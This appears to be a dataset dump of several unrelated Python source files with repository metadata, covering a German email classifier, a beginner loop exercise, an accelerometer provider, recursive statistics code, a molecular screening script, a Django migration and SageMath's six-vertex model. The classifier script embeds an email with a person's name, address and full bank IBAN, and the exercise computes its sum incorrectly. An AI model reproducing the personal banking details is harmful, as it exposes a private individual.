mapping_dict = load_mapping(mapping_file='../dataset/mapping.yaml')
# load the saved pipleine model
for filename in ["../trained_models/model_logreg.sav", "../trained_models/model_sgd.sav"]:
pipeline = load(filename)
# predict on the text
json_result = {}
for cls, prob in zip(pipeline.classes_.tolist(), pipeline.predict_proba([text]).tolist().pop()):
json_result[mapping_dict[cls]] = prob
print(filename, '\n', json_result) | 57.612903 | 801 | 0.787794 | import yaml
from joblib import load
from nltk.corpus import stopwords
from nltk.stem.snowball import SnowballStemmer
from helpers import preprocess_single_text, load_mapping
text = "ki_erstattung_test_topf2.txt Details Activity ki_erstattung_test_topf2.txt Sharing Info. Who has access M General Info. System properties Type Text Size 496 bytes Storage used 496 bytes Location testcases Owner Marc Bachmann Modified Dec 15, 2021 by Marc Bachmann Opened 6:32 PM by me Created Dec 15, 2021 Description. No description Download permissions. Viewers can download From: Marijke Holtkamp <m.etzrodtgweb.de> To: tierarztrechnung@barmenia.de Subject Tierarztrechungen Sent Thu, 21 Oct 2021 14:28:46+0200 IMG 2798.JPG IMG_2799.JPG Sehr geehrte Damen und Herren, anbei sende ich Ihnen die Tierarztrechnung unserer Hündin Clara Tari mit der bitte um Erstattung: KreisSparkasse Köln DE 74 3705 0299 1152 0271 47 BIC COKSDE33xxX Vielen Dank.! Mit freundlichem Gruß Marijke Holtkamp"
stopwords_locale = 'german'
stemmer = SnowballStemmer(stopwords_locale)
stop_words = set(stopwords.words(stopwords_locale))
with open('../dataset/stopwords.yaml', 'r') as f:
curated_stop_words = yaml.safe_load(f)
text = preprocess_single_text(text, stop_words=stop_words, curated_stop_words=curated_stop_words, stemming=True, stemmer=stemmer)
mapping_dict = load_mapping(mapping_file='../dataset/mapping.yaml')
# load the saved pipleine model
for filename in ["../trained_models/model_logreg.sav", "../trained_models/model_sgd.sav"]:
pipeline = load(filename)
# predict on the text
json_result = {}
for cls, prob in zip(pipeline.classes_.tolist(), pipeline.predict_proba([text]).tolist().pop()):
json_result[mapping_dict[cls]] = prob
print(filename, '\n', json_result) | 0 | 0 | 0 |
4f8e5b718a64351286c098419e412067fd72661c | 290 | py | Python | Lista3_11.py | AlessandroGoncalve/Lista3_Python | 68f18d0d0243b19e596df1309c502ae72fbaca37 | [
"MIT"
] | 12 | 2019-09-13T22:01:05.000Z | 2020-09-20T23:18:41.000Z | Lista3_11.py | AlessandroGoncalve/Lista3_Python | 68f18d0d0243b19e596df1309c502ae72fbaca37 | [
"MIT"
] | 1 | 2020-04-04T03:36:44.000Z | 2020-10-21T20:57:38.000Z | Lista3_11.py | AlessandroGoncalve/Lista3_Python | 68f18d0d0243b19e596df1309c502ae72fbaca37 | [
"MIT"
] | 12 | 2019-09-10T18:48:25.000Z | 2020-10-24T18:35:13.000Z | #Altere o programa anterior para mostrar no final a soma dos números.
n1 = int(input("Digite um número: "))
n2 = int(input("Digite outro número: "))
for i in range(n1 + 1, n2):
print(i)
for i in range(n2 + 1, n1):
print(i)
print("Soma dos números: ", i + i)
| 22.307692 | 70 | 0.593103 | #Altere o programa anterior para mostrar no final a soma dos números.
n1 = int(input("Digite um número: "))
n2 = int(input("Digite outro número: "))
for i in range(n1 + 1, n2):
print(i)
for i in range(n2 + 1, n1):
print(i)
print("Soma dos números: ", i + i)
| 0 | 0 | 0 |
bf752a0fbeb6d507311d56e1f4e724814a0350b1 | 1,538 | py | Python | packages/attitude.pkg/providers.py | GrahamCobb/maemo-mud-builder | 7bc03f5a1734a2b256e31808032d079c3e1e5720 | [
"ClArtistic"
] | null | null | null | packages/attitude.pkg/providers.py | GrahamCobb/maemo-mud-builder | 7bc03f5a1734a2b256e31808032d079c3e1e5720 | [
"ClArtistic"
] | null | null | null | packages/attitude.pkg/providers.py | GrahamCobb/maemo-mud-builder | 7bc03f5a1734a2b256e31808032d079c3e1e5720 | [
"ClArtistic"
] | null | null | null | #
# Provider information sources for `Attitude' - a false horizon display using
# accelerometer information. (c) Andrew Flegg 2009
# Released under the Artistic Licence
import os.path
from math import sin, cos, pi
class Dummy:
"""One of the simplest providers: returns dead-on, flat."""
class Demo:
"""A demonstration provider which will take the user on a tour through
the air."""
x = 0.0
y = 0.0
z = 0.0
class NokiaAccelerometer:
"""An accelerometer provider which actually reads an RX-51's
accelerometers, based on http://wiki.maemo.org/Accelerometers"""
global ACCELEROMETER_PATH
ACCELEROMETER_PATH = '/sys/class/i2c-adapter/i2c-3/3-001d/coord'
@classmethod
| 29.018868 | 79 | 0.574122 | #
# Provider information sources for `Attitude' - a false horizon display using
# accelerometer information. (c) Andrew Flegg 2009
# Released under the Artistic Licence
import os.path
from math import sin, cos, pi
class Dummy:
"""One of the simplest providers: returns dead-on, flat."""
def position(self):
#return (0, 0, -1000) # Back down
#return (0, 0, 1000) # Front down
#return (-1000, 0, 0) # Right edge down
#return (1000, 0, 0) # Left edge down
#return (0, -1000, 0) # Bottom edge down
return (-500, -500, 0) # Bottom right down
class Demo:
"""A demonstration provider which will take the user on a tour through
the air."""
x = 0.0
y = 0.0
z = 0.0
def position(self):
self.x += 0.1
self.y += 0.04
self.z += 0.03
return (sin(self.x) * 350,
sin(self.y) * 400 - 100,
sin(self.z) * 450)
class NokiaAccelerometer:
"""An accelerometer provider which actually reads an RX-51's
accelerometers, based on http://wiki.maemo.org/Accelerometers"""
global ACCELEROMETER_PATH
ACCELEROMETER_PATH = '/sys/class/i2c-adapter/i2c-3/3-001d/coord'
def position(self):
f = open(ACCELEROMETER_PATH, 'r')
coords = [int(w) for w in f.readline().split()]
f.close()
return coords
@classmethod
def available(cls):
return os.path.isfile(ACCELEROMETER_PATH)
| 639 | 0 | 114 |
9611e85309601b1043038f0147966d80aa76dc29 | 4,953 | py | Python | final_project.py | nikmoon/RecursiveStat | f1a31a70da3278ca4ada3dfa83875258170ce602 | [
"MIT"
] | null | null | null | final_project.py | nikmoon/RecursiveStat | f1a31a70da3278ca4ada3dfa83875258170ce602 | [
"MIT"
] | null | null | null | final_project.py | nikmoon/RecursiveStat | f1a31a70da3278ca4ada3dfa83875258170ce602 | [
"MIT"
] | null | null | null | # эти строки введены для IDE, их нужно закомментировать или удалить
"""
Список метрик и соответствующих им методов
"""
metrics = {
'productType': {
'method': getProductType,
'name': 'productType', # данное поле нужно использовать для названия вложенного поля
},
'productColor': {
'method': getProductColor,
'name': 'productColor',
},
'productCondition': {
'method': getProductCondition,
'name': 'productCondition',
}
}
"""
Список веток
"""
branches = {
'branch1': 'price==Low,condition==New',
'branch2': 'price==Medium,color==Red',
'branch3': 'color==Blue,price==High',
}
def getStatistics(strStats, values, globalFilter, limit=None, offset=None):
"""
:param strStats: 'productType;branch1;productColor;branch2;branch3;productCondition'
:param values: 'sklad1,sklad2'
:param globalFilter: ''
:param limit:
:param offset:
:return:
"""
def getRecursive(lvl=0, listStatFilter=[], statIndex=0):
"""
:param lvl: текущий уровень вложенности
:param listStatFilter: список предыдущих метрик, для которых получены статистики
:return: Возвращается список из двух элементов: ['имя метрики', [список статистик для метрики]]
Например: ['productType', [{'label': 'Окна', 'segment': 'productType==Окна',...}, {...}, ...]
listStats и listValues берутся из внешней функции
"""
# условие выхода из рекурсии - необходимо для случая, когда listStats изначально пустой
if statIndex == len(listStats):
return None
# формируем фильтр
filter = ';'.join(listStatFilter + globalFilter)
# берем очередную метрику, для которой нужна статистика
curStat = listStats[statIndex]
# если текущая метрика - branch
if curStat.startswith('branch'):
nameMetric = 'branch'
listBranches = [curStat]
# выбираем все идущие подряд бранчи
while statIndex < (len(listStats) - 1):
statIndex += 1
if not listStats[statIndex].startswith('branch'):
statIndex -= 1
break
listBranches.append(listStats[statIndex])
listBranches.append('All data') # для ветки 'All data'
# здесь мы имеем список с названиями бранчей, можно получить статистику для них
data = []
for branch in listBranches:
query = {
'method': 'branch', # значение указыает на то, что это запрос для бранча
'branch': branch,
'values': values,
'filter': filter,
'limit': None, # limit и offset тоже не имеют смысла в данной ветке
'offset': None,
}
data.append(get_stat_api([query])[0][0])
# если текущая метрика - обычная, например 'productType'
else:
nameMetric = metrics[curStat]['name']
list_of_queries = [{
'method': metrics[nameMetric]['method'],
'values': values,
'filter': filter,
'limit': limit if lvl == 0 else None,
'offset': offset if lvl == 0 else None,
}]
data = get_stat_api(list_of_queries)[0]
# условие выхода из рекурсии - достигнут конец списка listStats
if (statIndex + 1) == len(listStats):
return [nameMetric, data]
# если у нас есть вложенные бранчи, то здесь самое место для их обработки
if listStats[statIndex + 1] == 'subbranch':
statIndex += 1 # просто пропускаем данный элемент списка
# здесь у нас есть список статистик в data и соответствующее им название метрики
for item in data:
# если текущий элемент не имеет поля 'segment', для него рекурсия закончена - он последний в цепочке
if 'segment' not in item:
continue
result = getRecursive(lvl + 1, listStatFilter + [item['segment']], statIndex + 1)
# вот здесь result[0] как раз равно metrics[metricName]['name']
item[result[0]] = result[1]
return [nameMetric, data]
# для корректной обработки вложенных бранчей типа branch1,branch2|branch3
# заменим разделяющий знак дополнительной "виртуальной" метрикой, чтобы получился примерно
# такой список ['branch1', 'branch2', 'subbranch', "branch3"]
strStats = strStats.replace('|', ',subbranch,')
# преобразовываем строку с необходимыми статистиками в список,
# сначала удалив все пробелы из строки
listStats = strStats.replace(' ', '').split(',')
return {
'stats': getRecursive()[1],
}
| 35.633094 | 112 | 0.592166 | # эти строки введены для IDE, их нужно закомментировать или удалить
def getProductType(): pass
def getProductColor(): pass
def getProductCondition(): pass
def get_stat_api(list_of_queries): pass
"""
Список метрик и соответствующих им методов
"""
metrics = {
'productType': {
'method': getProductType,
'name': 'productType', # данное поле нужно использовать для названия вложенного поля
},
'productColor': {
'method': getProductColor,
'name': 'productColor',
},
'productCondition': {
'method': getProductCondition,
'name': 'productCondition',
}
}
"""
Список веток
"""
branches = {
'branch1': 'price==Low,condition==New',
'branch2': 'price==Medium,color==Red',
'branch3': 'color==Blue,price==High',
}
def getStatistics(strStats, values, globalFilter, limit=None, offset=None):
"""
:param strStats: 'productType;branch1;productColor;branch2;branch3;productCondition'
:param values: 'sklad1,sklad2'
:param globalFilter: ''
:param limit:
:param offset:
:return:
"""
def getRecursive(lvl=0, listStatFilter=[], statIndex=0):
"""
:param lvl: текущий уровень вложенности
:param listStatFilter: список предыдущих метрик, для которых получены статистики
:return: Возвращается список из двух элементов: ['имя метрики', [список статистик для метрики]]
Например: ['productType', [{'label': 'Окна', 'segment': 'productType==Окна',...}, {...}, ...]
listStats и listValues берутся из внешней функции
"""
# условие выхода из рекурсии - необходимо для случая, когда listStats изначально пустой
if statIndex == len(listStats):
return None
# формируем фильтр
filter = ';'.join(listStatFilter + globalFilter)
# берем очередную метрику, для которой нужна статистика
curStat = listStats[statIndex]
# если текущая метрика - branch
if curStat.startswith('branch'):
nameMetric = 'branch'
listBranches = [curStat]
# выбираем все идущие подряд бранчи
while statIndex < (len(listStats) - 1):
statIndex += 1
if not listStats[statIndex].startswith('branch'):
statIndex -= 1
break
listBranches.append(listStats[statIndex])
listBranches.append('All data') # для ветки 'All data'
# здесь мы имеем список с названиями бранчей, можно получить статистику для них
data = []
for branch in listBranches:
query = {
'method': 'branch', # значение указыает на то, что это запрос для бранча
'branch': branch,
'values': values,
'filter': filter,
'limit': None, # limit и offset тоже не имеют смысла в данной ветке
'offset': None,
}
data.append(get_stat_api([query])[0][0])
# если текущая метрика - обычная, например 'productType'
else:
nameMetric = metrics[curStat]['name']
list_of_queries = [{
'method': metrics[nameMetric]['method'],
'values': values,
'filter': filter,
'limit': limit if lvl == 0 else None,
'offset': offset if lvl == 0 else None,
}]
data = get_stat_api(list_of_queries)[0]
# условие выхода из рекурсии - достигнут конец списка listStats
if (statIndex + 1) == len(listStats):
return [nameMetric, data]
# если у нас есть вложенные бранчи, то здесь самое место для их обработки
if listStats[statIndex + 1] == 'subbranch':
statIndex += 1 # просто пропускаем данный элемент списка
# здесь у нас есть список статистик в data и соответствующее им название метрики
for item in data:
# если текущий элемент не имеет поля 'segment', для него рекурсия закончена - он последний в цепочке
if 'segment' not in item:
continue
result = getRecursive(lvl + 1, listStatFilter + [item['segment']], statIndex + 1)
# вот здесь result[0] как раз равно metrics[metricName]['name']
item[result[0]] = result[1]
return [nameMetric, data]
# для корректной обработки вложенных бранчей типа branch1,branch2|branch3
# заменим разделяющий знак дополнительной "виртуальной" метрикой, чтобы получился примерно
# такой список ['branch1', 'branch2', 'subbranch', "branch3"]
strStats = strStats.replace('|', ',subbranch,')
# преобразовываем строку с необходимыми статистиками в список,
# сначала удалив все пробелы из строки
listStats = strStats.replace(' ', '').split(',')
return {
'stats': getRecursive()[1],
}
| 39 | 0 | 88 |
8a5dc9f0ee9a0de84f2ecc9552a6e60c7b9fee48 | 1,466 | py | Python | deploy2.py | JiajunZhou96/ML-for-LSD1 | 595630076928f0c0d0b78ce182478b7fb0d20ead | [
"MIT"
] | 1 | 2021-12-20T11:50:06.000Z | 2021-12-20T11:50:06.000Z | deploy2.py | JiajunZhou96/ML-for-LSD1 | 595630076928f0c0d0b78ce182478b7fb0d20ead | [
"MIT"
] | null | null | null | deploy2.py | JiajunZhou96/ML-for-LSD1 | 595630076928f0c0d0b78ce182478b7fb0d20ead | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import re
import time
import os
from sklearn.svm import SVR
import joblib
import rdkit
from rdkit import Chem
from rdkit.Chem import AllChem
from rdkit_utils import smiles_dataset
from utils import save_dataset
model_load = joblib.load('./models/model.pkl')
database = pd.read_csv('./screening_base/in-vitro_zinc/in-vitro.csv')
screen_database = pd.read_csv('./datasets/screen_results/in-vitro_zinc/in-vitro_bits.csv')
screen_result = model_load.predict(screen_database)
screen_result_fp = pd.DataFrame({'Predictive Results': screen_result})
database_result = pd.concat([database, screen_result_fp], axis = 1)
threshold_7 = database_result[database_result['Predictive Results'] > 7]
original_dataset = pd.read_csv('./datasets/all_structures.csv')
de_threshold_7 = threshold_7
for smile in original_dataset['Smiles']:
for new_structure in threshold_7['smiles']:
if smile == new_structure:
index = threshold_7[threshold_7['smiles'] == smile].index[0]
print('overlap found at position: {:01d}'.format(index))
de_threshold_7 = de_threshold_7.drop(index = index, axis = 0)
else:
pass
save_dataset(threshold_7, path = './datasets/screen_results/in-vitro_zinc/', file_name = 'threshold_7', idx = False)
save_dataset(de_threshold_7, path = './datasets/screen_results/in-vitro_zinc/', file_name = 'de_threshold_7', idx = False)
| 35.756098 | 122 | 0.749659 | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import re
import time
import os
from sklearn.svm import SVR
import joblib
import rdkit
from rdkit import Chem
from rdkit.Chem import AllChem
from rdkit_utils import smiles_dataset
from utils import save_dataset
model_load = joblib.load('./models/model.pkl')
database = pd.read_csv('./screening_base/in-vitro_zinc/in-vitro.csv')
screen_database = pd.read_csv('./datasets/screen_results/in-vitro_zinc/in-vitro_bits.csv')
screen_result = model_load.predict(screen_database)
screen_result_fp = pd.DataFrame({'Predictive Results': screen_result})
database_result = pd.concat([database, screen_result_fp], axis = 1)
threshold_7 = database_result[database_result['Predictive Results'] > 7]
original_dataset = pd.read_csv('./datasets/all_structures.csv')
de_threshold_7 = threshold_7
for smile in original_dataset['Smiles']:
for new_structure in threshold_7['smiles']:
if smile == new_structure:
index = threshold_7[threshold_7['smiles'] == smile].index[0]
print('overlap found at position: {:01d}'.format(index))
de_threshold_7 = de_threshold_7.drop(index = index, axis = 0)
else:
pass
save_dataset(threshold_7, path = './datasets/screen_results/in-vitro_zinc/', file_name = 'threshold_7', idx = False)
save_dataset(de_threshold_7, path = './datasets/screen_results/in-vitro_zinc/', file_name = 'de_threshold_7', idx = False)
| 0 | 0 | 0 |
6fd6c18fabfe36ee89c947678a6f06714899f0c2 | 798 | py | Python | core/migrations/0012_auto_20210813_0035.py | winny-/sillypaste | bf6125b35225046226328d1077d7bc7ea5e11c94 | [
"Unlicense"
] | 3 | 2021-05-21T03:45:59.000Z | 2022-01-23T18:26:45.000Z | core/migrations/0012_auto_20210813_0035.py | winny-/sillypaste | bf6125b35225046226328d1077d7bc7ea5e11c94 | [
"Unlicense"
] | 13 | 2021-04-03T19:56:35.000Z | 2022-01-23T18:39:47.000Z | core/migrations/0012_auto_20210813_0035.py | winny-/sillypaste | bf6125b35225046226328d1077d7bc7ea5e11c94 | [
"Unlicense"
] | 1 | 2021-10-03T18:22:55.000Z | 2021-10-03T18:22:55.000Z | # Generated by Django 3.1.12 on 2021-08-13 00:35
from django.db import migrations, models
import django.utils.timezone
| 27.517241 | 76 | 0.601504 | # Generated by Django 3.1.12 on 2021-08-13 00:35
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [('core', '0011_auto_20201105_0203')]
operations = [
migrations.RenameField(
model_name='expirylog', old_name='count', new_name='paste_count'
),
migrations.AddField(
model_name='expirylog',
name='user_count',
field=models.PositiveIntegerField(default=0),
),
migrations.AddField(
model_name='expirylog',
name='user_cutoff',
field=models.DateTimeField(
auto_now_add=True, default=django.utils.timezone.now
),
preserve_default=False,
),
]
| 0 | 654 | 23 |
4d693c50b234f4d287b9940411df75b8d66801fe | 25,754 | py | Python | src/sage/combinat/six_vertex_model.py | fredstro/sage | c936d2cda81ec7ec3552a3bdb29c994b40d1bb24 | [
"BSL-1.0"
] | null | null | null | src/sage/combinat/six_vertex_model.py | fredstro/sage | c936d2cda81ec7ec3552a3bdb29c994b40d1bb24 | [
"BSL-1.0"
] | null | null | null | src/sage/combinat/six_vertex_model.py | fredstro/sage | c936d2cda81ec7ec3552a3bdb29c994b40d1bb24 | [
"BSL-1.0"
] | null | null | null | r"""
Six Vertex Model
"""
from sage.structure.parent import Parent
from sage.structure.unique_representation import UniqueRepresentation
from sage.structure.list_clone import ClonableArray
from sage.categories.finite_enumerated_sets import FiniteEnumeratedSets
from sage.combinat.combinatorial_map import combinatorial_map
class SixVertexConfiguration(ClonableArray):
"""
A configuration in the six vertex model.
"""
def check(self):
"""
Check if ``self`` is a valid 6 vertex configuration.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: M[0].check()
"""
if self not in self.parent():
raise ValueError("invalid configuration")
def _repr_(self):
"""
Return a string representation of ``self``.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: M[0]
^ ^ ^
| | |
--> # <- # <- # <--
| ^ ^
V | |
--> # -> # <- # <--
| | ^
V V |
--> # -> # -> # <--
| | |
V V V
"""
# List are in the order of URDL
ascii = [[r' V ', ' -', r' ^ ', '- '], # LR
[r' | ', ' <', r' ^ ', '- '], # LU
[r' V ', ' <', r' | ', '- '], # LD
[r' | ', ' <', r' | ', '> '], # UD
[r' | ', ' -', r' ^ ', '> '], # UR
[r' V ', ' -', r' | ', '> ']] # RD
ret = ' '
# Do the top line
for entry in self[0]:
if entry == 1 or entry == 3 or entry == 4:
ret += ' ^ '
else:
ret += ' | '
# Do the meat of the ascii art
for row in self:
ret += '\n '
# Do the top row
for entry in row:
ret += ascii[entry][0]
ret += '\n'
# Do the left-most entry
if row[0] == 0 or row[0] == 1 or row[0] == 2:
ret += '<-'
else:
ret += '--'
# Do the middle row
for entry in row:
ret += ascii[entry][3] + '#' + ascii[entry][1]
# Do the right-most entry
if row[-1] == 0 or row[-1] == 4 or row[-1] == 5:
ret += '->'
else:
ret += '--'
# Do the bottom row
ret += '\n '
for entry in row:
ret += ascii[entry][2]
# Do the bottom line
ret += '\n '
for entry in self[-1]:
if entry == 2 or entry == 3 or entry == 5:
ret += ' V '
else:
ret += ' | '
return ret
def to_signed_matrix(self):
"""
Return the signed matrix of ``self``.
The signed matrix corresponding to a six vertex configuration is
given by `0` if there is a cross flow, a `1` if the outward arrows
are vertical and `-1` if the outward arrows are horizonal.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: map(lambda x: x.to_signed_matrix(), M)
[
[1 0 0] [1 0 0] [ 0 1 0] [0 1 0] [0 1 0] [0 0 1] [0 0 1]
[0 1 0] [0 0 1] [ 1 -1 1] [1 0 0] [0 0 1] [1 0 0] [0 1 0]
[0 0 1], [0 1 0], [ 0 1 0], [0 0 1], [1 0 0], [0 1 0], [1 0 0]
]
"""
from sage.matrix.constructor import matrix
# verts = ['LR', 'LU', 'LD', 'UD', 'UR', 'RD']
return matrix([[matrix_sign(_) for _ in row] for row in self])
def plot(self, color='sign'):
"""
Return a plot of ``self``.
INPUT:
- ``color`` -- can be any of the following:
* ``4`` - use 4 colors: black, red, blue, and green with each
corresponding to up, right, down, and left respectively
* ``2`` - use 2 colors: red for horizontal, blue for vertical arrows
* ``'sign'`` - use red for right and down arrows, blue for left
and up arrows
* a list of 4 colors for each direction
* a function which takes a direction and a boolean corresponding
to the sign
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: print M[0].plot().description()
Arrow from (-1.0,0.0) to (0.0,0.0)
Arrow from (-1.0,1.0) to (0.0,1.0)
Arrow from (0.0,0.0) to (0.0,-1.0)
Arrow from (0.0,0.0) to (1.0,0.0)
Arrow from (0.0,1.0) to (0.0,0.0)
Arrow from (0.0,1.0) to (0.0,2.0)
Arrow from (1.0,0.0) to (1.0,-1.0)
Arrow from (1.0,0.0) to (1.0,1.0)
Arrow from (1.0,1.0) to (0.0,1.0)
Arrow from (1.0,1.0) to (1.0,2.0)
Arrow from (2.0,0.0) to (1.0,0.0)
Arrow from (2.0,1.0) to (1.0,1.0)
"""
from sage.plot.graphics import Graphics
from sage.plot.circle import circle
from sage.plot.arrow import arrow
if color == 4:
color_list = ['black', 'red', 'blue', 'green']
cfunc = lambda d,pm: color_list[d]
elif color == 2:
cfunc = lambda d,pm: 'red' if d % 2 == 0 else 'blue'
elif color == 1 or color is None:
cfunc = lambda d,pm: 'black'
elif color == 'sign':
cfunc = lambda d,pm: 'red' if pm else 'blue' # RD are True
elif isinstance(color, (list, tuple)):
cfunc = lambda d,pm: color[d]
else:
cfunc = color
G = Graphics()
for j,row in enumerate(reversed(self)):
for i,entry in enumerate(row):
if entry == 0: # LR
G += arrow((i,j+1), (i,j), color=cfunc(2, True))
G += arrow((i,j), (i+1,j), color=cfunc(1, True))
if j == 0:
G += arrow((i,j-1), (i,j), color=cfunc(0, False))
if i == 0:
G += arrow((i,j), (i-1,j), color=cfunc(3, False))
elif entry == 1: # LU
G += arrow((i,j), (i,j+1), color=cfunc(0, False))
G += arrow((i+1,j), (i,j), color=cfunc(3, False))
if j == 0:
G += arrow((i,j-1), (i,j), color=cfunc(0, False))
if i == 0:
G += arrow((i,j), (i-1,j), color=cfunc(3, False))
elif entry == 2: # LD
G += arrow((i,j+1), (i,j), color=cfunc(2, True))
G += arrow((i+1,j), (i,j), color=cfunc(3, False))
if j == 0:
G += arrow((i,j), (i,j-1), color=cfunc(2, True))
if i == 0:
G += arrow((i,j), (i-1,j), color=cfunc(3, False))
elif entry == 3: # UD
G += arrow((i,j), (i,j+1), color=cfunc(0, False))
G += arrow((i+1,j), (i,j), color=cfunc(3, False))
if j == 0:
G += arrow((i,j), (i,j-1), color=cfunc(2, True))
if i == 0:
G += arrow((i-1,j), (i,j), color=cfunc(1, True))
elif entry == 4: # UR
G += arrow((i,j), (i,j+1), color=cfunc(0, False))
G += arrow((i,j), (i+1,j), color=cfunc(1, True))
if j == 0:
G += arrow((i,j-1), (i,j), color=cfunc(0, False))
if i == 0:
G += arrow((i-1,j), (i,j), color=cfunc(1, True))
elif entry == 5: # RD
G += arrow((i,j+1), (i,j), color=cfunc(2, True))
G += arrow((i,j), (i+1,j), color=cfunc(1, True))
if j == 0:
G += arrow((i,j), (i,j-1), color=cfunc(2, True))
if i == 0:
G += arrow((i-1,j), (i,j), color=cfunc(1, True))
G.axes(False)
return G
def energy(self, epsilon):
r"""
Return the energy of the configuration.
The energy of a configuration `\nu` is defined as
.. MATH::
E(\nu) = n_0 \epsilon_0 + n_1 \epsilon_1 + \cdots + n_5 \epsilon_5
where `n_i` is the number of vertices of type `i` and
`\epsilon_i` is the `i`-th energy constant.
.. NOTE::
We number our configurations as:
0. LR
1. LU
2. LD
3. UD
4. UR
5. RD
which differs from :wikipedia:`Ice-type_model`.
EXAMPLES::
sage: M = SixVertexModel(3, boundary_conditions='ice')
sage: nu = M[2]; nu
^ ^ ^
| | |
--> # -> # <- # <--
^ | ^
| V |
--> # <- # -> # <--
| ^ |
V | V
--> # -> # <- # <--
| | |
V V V
sage: nu.energy([1,2,1,2,1,2])
15
A KDP energy::
sage: nu.energy([1,1,0,1,0,1])
7
A Rys `F` energy::
sage: nu.energy([0,1,1,0,1,1])
4
The zero field assumption::
sage: nu.energy([1,2,3,1,3,2])
15
"""
if len(epsilon) != 6:
raise ValueError("there must be 6 energy constants")
return sum(epsilon[entry] for row in self for entry in row)
class SixVertexModel(UniqueRepresentation, Parent):
"""
The six vertex model.
We model a configuration by indicating which configuration by the
following six configurations which are determined by the two outgoing
arrows in the Up, Right, Down, Left directions:
1. LR::
|
V
<-- # -->
^
|
2. LU::
^
|
<-- # <--
^
|
3. LD::
|
V
<-- # <--
|
V
4. UD::
^
|
--> # <--
|
V
5. UR::
^
|
--> # -->
^
|
6. RD::
|
V
--> # -->
|
V
INPUT:
- ``n`` -- the number of rows
- ``m`` -- (optional) the number of columns, if not specified, then
the number of columns is the number of rows
- ``boundary_conditions`` -- (optional) a quadruple of tuples whose
entries are either:
* ``True`` for an inward arrow,
* ``False`` for an outward arrow, or
* ``None`` for no boundary condition.
There are also the following predefined boundary conditions:
* ``'ice'`` - The top and bottom boundary conditions are outward and the
left and right boundary conditions are inward; this gives the square
ice model. Also called domain wall boundary conditions.
* ``'domain wall'`` - Same as ``'ice'``.
* ``'alternating'`` - The boundary conditions alternate between inward
and outward.
* ``'free'`` - There are no boundary conditions.
EXAMPLES:
Here are the six types of vertices that can be created::
sage: M = SixVertexModel(1)
sage: list(M)
[
| ^ | ^ ^ |
V | V | | V
<-- # --> <-- # <-- <-- # <-- --> # <-- --> # --> --> # -->
^ ^ | | ^ |
| , | , V , V , | , V
]
When using the square ice model, it is known that the number of
configurations is equal to the number of alternating sign matrices::
sage: M = SixVertexModel(1, boundary_conditions='ice')
sage: len(M)
1
sage: M = SixVertexModel(4, boundary_conditions='ice')
sage: len(M)
42
sage: all(len(SixVertexModel(n, boundary_conditions='ice'))
....: == AlternatingSignMatrices(n).cardinality() for n in range(1, 7))
True
An example with a specified non-standard boundary condition and
non-rectangular shape::
sage: M = SixVertexModel(2, 1, [[None], [True,True], [None], [None,None]])
sage: list(M)
[
^ ^ | ^
| | V |
<-- # <-- <-- # <-- <-- # <-- --> # <--
^ ^ | |
| | V V
<-- # <-- --> # <-- <-- # <-- <-- # <--
^ | | |
| , V , V , V
]
REFERENCES:
- :wikipedia:`Vertex_model`
- :wikipedia:`Ice-type_model`
"""
@staticmethod
def __classcall_private__(cls, n, m=None, boundary_conditions=None):
"""
Normalize input to ensure a unique representation.
EXAMPLES::
sage: M1 = SixVertexModel(1, boundary_conditions=[[False],[True],[False],[True]])
sage: M2 = SixVertexModel(1, 1, ((False,),(True,),(False,),(True,)))
sage: M1 is M2
True
"""
if m is None:
m = n
if boundary_conditions is None or boundary_conditions == 'free':
boundary_conditions = ((None,)*m, (None,)*n)*2
elif boundary_conditions == 'alternating':
bdry = True
cond = []
for dummy in range(2):
val = []
for k in range(m):
val.append(bdry)
bdry = not bdry
cond.append(tuple(val))
val = []
for k in range(n):
val.append(bdry)
bdry = not bdry
cond.append(tuple(val))
boundary_conditions = tuple(cond)
elif boundary_conditions == 'ice' or boundary_conditions == 'domain wall':
if m == n:
return SquareIceModel(n)
boundary_conditions = ((False,)*m, (True,)*n)*2
else:
boundary_conditions = tuple(tuple(x) for x in boundary_conditions)
return super(SixVertexModel, cls).__classcall__(cls, n, m, boundary_conditions)
def __init__(self, n, m, boundary_conditions):
"""
Initialize ``self``.
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: TestSuite(M).run()
"""
self._nrows = n
self._ncols = m
self._bdry_cond = boundary_conditions # Ordered URDL
Parent.__init__(self, category=FiniteEnumeratedSets())
def _repr_(self):
"""
Return a string representation of ``self``.
EXAMPLES::
sage: SixVertexModel(2, boundary_conditions='ice')
The six vertex model on a 2 by 2 grid
"""
return "The six vertex model on a {} by {} grid".format(self._nrows, self._ncols)
def _repr_option(self, key):
"""
Metadata about the ``_repr_()`` output.
See :meth:`sage.structure.parent._repr_option` for details.
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: M._repr_option('element_ascii_art')
True
"""
if key == 'element_ascii_art':
return True
return Parent._repr_option(self, key)
def _element_constructor_(self, x):
"""
Construct an element of ``self``.
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: M([[3,1],[5,3]])
^ ^
| |
--> # <- # <--
| ^
V |
--> # -> # <--
| |
V V
"""
if isinstance(x, SixVertexConfiguration):
if x.parent() is not self:
return self.element_class(self, tuple(x))
return x
verts = ['LR', 'LU', 'LD', 'UD', 'UR', 'RD']
elt = []
for row in x:
elt.append([])
for entry in row:
if entry in verts:
elt[-1].append(verts.index(entry))
elif entry in range(6):
elt[-1].append(entry)
else:
raise ValueError("invalid entry")
elt[-1] = tuple(elt[-1])
return self.element_class(self, tuple(elt))
Element = SixVertexConfiguration
def __iter__(self):
"""
Iterate through ``self``.
EXAMPLES::
sage: M = SixVertexModel(2, boundary_conditions='ice')
sage: list(M)
[
^ ^ ^ ^
| | | |
--> # <- # <-- --> # -> # <--
| ^ ^ |
V | | V
--> # -> # <-- --> # <- # <--
| | | |
V V , V V
]
"""
# Boundary conditions ordered URDL
# The top row boundary condition of True is a downward arrow
# The left condition of True is a right arrow
# verts = ['LR', 'LU', 'LD', 'UD', 'UR', 'RD']
